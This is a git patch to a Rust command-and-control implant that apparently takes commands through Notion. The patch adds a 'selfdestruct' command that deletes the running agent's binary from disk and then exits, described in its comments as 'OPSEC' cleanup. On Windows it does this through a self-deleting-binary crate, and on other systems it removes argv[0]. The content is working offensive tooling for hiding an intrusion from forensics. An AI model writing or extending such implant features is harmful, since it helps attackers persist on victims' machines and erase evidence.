From a718b56add520b9fc0bc367066172824fa623072 Mon Sep 17 00:00:00 2001
From: husky <huskyhacks.mk@gmail.com>
Date: Wed, 9 Mar 2022 17:01:14 -0500
Subject: [PATCH] self destruct mvp

---
 agent/Cargo.lock              | 10 +++++++++
 agent/Cargo.toml              |  2 ++
 agent/src/cmd/mod.rs          |  4 ++++
 agent/src/cmd/selfdestruct.rs | 38 +++++++++++++++++++++++++++++++++++
 agent/src/main.rs             |  1 +
 5 files changed, 55 insertions(+)
 create mode 100644 agent/src/cmd/selfdestruct.rs

diff --git a/agent/Cargo.lock b/agent/Cargo.lock
index 6d7e783..3e7d493 100755
--- a/agent/Cargo.lock
+++ b/agent/Cargo.lock
@@ -282,6 +282,15 @@ dependencies = [
  "libc",
 ]
 
+[[package]]
+name = "houdini"
+version = "1.0.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9a21c047df31ebe5936e1a8f8a1fd1020933fca89909625c481b651273b97eef"
+dependencies = [
+ "winapi 0.3.9",
+]
+
 [[package]]
 name = "http"
 version = "0.2.6"
@@ -583,6 +592,7 @@ dependencies = [
  "base64",
  "cidr-utils",
  "embed-resource",
+ "houdini",
  "is-root",
  "kernel32-sys",
  "libc",
diff --git a/agent/Cargo.toml b/agent/Cargo.toml
index 9705fdd..510567d 100755
--- a/agent/Cargo.toml
+++ b/agent/Cargo.toml
@@ -27,6 +27,8 @@ embed-resource = "1.6"
 kernel32-sys = "0.2.2"
 winapi = { version = "0.3.8", features = ["winnt","winuser", "handleapi", "processthreadsapi", "securitybaseapi"] }
 winreg = "0.10"
+houdini = "1.0.2"
+
 
 [profile.dev]
 opt-level = 0
diff --git a/agent/src/cmd/mod.rs b/agent/src/cmd/mod.rs
index fcecdfc..2d49634 100755
--- a/agent/src/cmd/mod.rs
+++ b/agent/src/cmd/mod.rs
@@ -24,6 +24,7 @@ mod sleep;
 mod shutdown;
 mod whoami;
 mod unknown;
+mod selfdestruct;
 
 /// All the possible command types. Some have command strings, and some don't.
 pub enum CommandType {
@@ -37,6 +38,7 @@ pub enum CommandType {
     Ps,
     Pwd,
     Save,
+    Selfdestruct,
     Runas,
     Shell,
     Shutdown,
@@ -156,6 +158,7 @@ impl NotionCommand {
                 "pwd"      => CommandType::Pwd,
                 "runas"    => CommandType::Runas,
                 "save"     => CommandType::Save,
+                "selfdestruct" => CommandType::Selfdestruct,
                 "shell"    => CommandType::Shell,
                 "shutdown" => CommandType::Shutdown,
                 "sleep"    => CommandType::Sleep,
@@ -182,6 +185,7 @@ impl NotionCommand {
             CommandType::Pwd         => pwd::handle().await,
             CommandType::Runas    => runas::handle(&self.args).await,
             CommandType::Save     => save::handle(&mut self.args, config_options).await,
+            CommandType::Selfdestruct => selfdestruct::handle().await,
             CommandType::Shell    => shell::handle(&mut self.args).await,
             CommandType::Shutdown    => shutdown::handle().await,
             CommandType::Sleep    => sleep::handle(&mut self.args, config_options).await,
diff --git a/agent/src/cmd/selfdestruct.rs b/agent/src/cmd/selfdestruct.rs
new file mode 100644
index 0000000..3f2f893
--- /dev/null
+++ b/agent/src/cmd/selfdestruct.rs
@@ -0,0 +1,38 @@
+use std::error::Error;
+use std::env::args;
+use std::fs::remove_file;
+#[cfg(windows)] use houdini;
+#[cfg(windows)] use rand::{thread_rng, Rng};
+#[cfg(windows)] use rand::distributions::Alphanumeric;
+
+
+pub async fn handle() -> Result<String, Box<dyn Error>> {
+        /// Performs some OPSEC cleanups, deletes itself from disk, and kills the agent.
+        /// Burn after reading style.
+        /// For Windows, makes use of Yamakadi's fantastic houdini crate, based on jonaslyk's self-deleting binary research and byt3bl33d3r's Nim POC
+        /// For Nix, just deletes arg[0] lol.
+        /// Usage: selfdestruct 🎯
+
+        // TODO: Overwrite proc memory with junk
+
+        // Delete bin on disk
+        
+        #[cfg(windows)] {
+                let rand_string: String = thread_rng()
+                .sample_iter(&Alphanumeric)
+                .take(12)
+                .map(char::from)
+                .collect();
+
+                houdini::disappear_with_placeholder(rand_string);
+        }
+
+        #[cfg(not(windows))] {
+                let running_agent: String = args().nth(0).unwrap();
+                remove_file(running_agent)?;
+        }
+
+        // Shutdown agent
+        // In main.rs, shutdown::handle exits the current running process
+        Ok("[!] This agent will now self-destruct!\n[!] 3...2...1...💣💥!".to_string())
+}
\ No newline at end of file
diff --git a/agent/src/main.rs b/agent/src/main.rs
index ec251a6..f9d3fb3 100755
--- a/agent/src/main.rs
+++ b/agent/src/main.rs
@@ -144,6 +144,7 @@ async fn main() -> Result<(), Box<dyn std::error::Error>> {
                         // Like shutting down the agent
                         match notion_command.command_type {
                             CommandType::Shutdown => {exit(0);},
+                            CommandType::Selfdestruct => {exit(0)},
                             _ => {}
                         }
                     };